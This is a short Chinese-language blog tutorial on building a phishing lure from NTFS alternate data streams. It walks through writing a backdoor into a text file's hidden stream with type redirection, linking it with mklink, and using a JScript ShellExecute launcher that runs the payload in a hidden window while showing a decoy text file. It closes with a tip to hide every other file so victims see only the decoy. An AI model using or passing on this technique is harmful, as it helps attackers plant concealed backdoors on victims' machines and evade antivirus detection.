制作ADS流文件进行钓鱼

大家好，我是Alex。今天教大家制作ADS流文件钓鱼，在windows下就可以完成了。随着杀毒软件功能的日益强大，病毒总会借助各式各样的隐藏手段来逃避杀毒软件的“追捕”。有些病毒会通过设置文件属性来隐藏自身，从而长期伏在计算机中，使自己很难被用户发现。一种更为隐蔽、危害性更大的隐藏方法逐渐被病毒利用，即利用NTFS数据流来隐藏病毒，此类病毒我们称之为ADS流病毒或ZeroAcess。

我们把后门放在文件夹下，并且新建一个txt文档

打开cmd使用type命令重定向，将程序写入文件流

使用mklink命令创建文件链接

然后新建一个用于显示的txt文档

最后，写一个JS文件

var objShell = newActiveXObject("shell.application");

objShell.ShellExecute("cmd.exe","/c alex.txt", "", "open", 0);

objShell.ShellExecute("2.txt","", "", "open", 1);

咱们执行一下！

(o゜▽゜)o☆[BINGO!]

PS:大家可以把除去显示的txt文档外其余所有文件隐藏，然后放入一个主程序

你会喜欢

震惊！某安全人员打击钓鱼网站

无需加载宏制作PPTX钓鱼

思路超前，Package 钓鱼